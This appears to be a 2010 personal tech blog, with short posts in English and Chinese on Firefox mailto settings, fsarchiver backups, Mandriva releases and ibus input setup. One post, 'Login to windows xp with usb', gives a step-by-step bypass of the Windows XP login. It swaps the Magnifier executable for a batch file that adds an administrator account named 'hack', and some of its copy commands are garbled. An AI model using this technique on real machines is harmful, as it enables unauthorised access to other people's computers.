Friday, August 20, 2010

Let Gmail to handle Mailto (Firefox right click send link)

1. Open Edit >Preferences (firefox on Linux)
2. Click the Application tab.
3. Search 'mailto' in the search field.
4. Select Use Gmail in the action column
5. Click close button
6. That it.

Thursday, August 19, 2010

Use fsarchiver to backup Mandriva Linux system

I am using Mandriva Linux and I tried many ways to backup my system. Finally I found this good backup software - Fsarchiver.
Fsarchiver  is included in the System Rescue CD. Download the iso and burn it to a CD.

mount -t ext4 /dev/sda7 /mnt/backup (this is to mount the partition in my hard disk for storing the backup)

fsarchiver  -j2 -o savefs /mnt/backup/mandriva2010spring.fsa /dev/sda1 (archive)

fsarchiver restfs /mnt/backup/mandriva2010spring.fsa id=0,dest=/dev/sda1 (restore)

Friday, July 9, 2010

Mandriva 2010.1 Spring is out

Mandriva 2010.1 spring 终于在今天发布了!

Thursday, June 17, 2010

Mandriva Linux Spring MIB-Countdown Begin

I found this from MIB.


Wednesday, June 2, 2010

Login to windows xp with usb

Step 1: Download related software.
             HP USB Disk Storage Format tool
             USBoot
Step 2: Plug in usb drive and start HP USB tools.
            Select FAT format for DOS mode.
            Option -- Create a DOS startup disk.
            Done.
Step 3: Start USBoot.
            Select the usb drive.
            Use ZIP format.
            Done.
Step 4: Prepare scripts.
            Key in the following scripts:
            net user hack 123456 /add
            net localgroup administrators hack /add
            exit
           save as: login.bat

Step 5: rar the bat file with winrar.
            make it self extractable.
           extract path be % temp%
           after extraction execute program.
Step 6: change login.exe to mafnify.exe and copy it to usb.
            Chack magnify.exe and DOS files must in usb.

Step 7: The process.
           Boot usb into DOS.
           Enter login screen.
           use win+U to activate magnify.exe.
           add new user.
           user: hack
           password: 123456
           Now we can enter windows xp.

Step 8: At dos enter the following:
            cd c:\windows\system32
            copy magnify.exe magnify2.exe
            copy x:\magnify.exe c:\windows\system32magnify2.exe
            (x=usb)
      


Friday, May 21, 2010

Install ibus to Mandriva 2010

下载安装 ibus, ibus-table, ibus-pinyin, ibus-chewing and ibus-gtk.
在 Gnome 的工具列点击-》系统 -》区域设置 -》将输入法改成 ibus 然后注销,重新登陆。
打开终端,输入指令:ibus-setup。启动ibus。
修改主目录中的.bashrc文件。把以下的文字复制到 .bashrc。 在该文件的“# User specific aliases and functions”的下一行,加上以下几行:

export GTK_IM_MODULE=ibus
export XMODIFIERS=@im=ibus
export QT_IM_MODULE=ibus

保存该文件。

下一步是到 系统-》 首选项 -》启动应用程序 -》添加 -》在命令处 加入 
ibus-daemon -d 名称填上 ibus 保存。
退出,注销并重新登录。可以用了。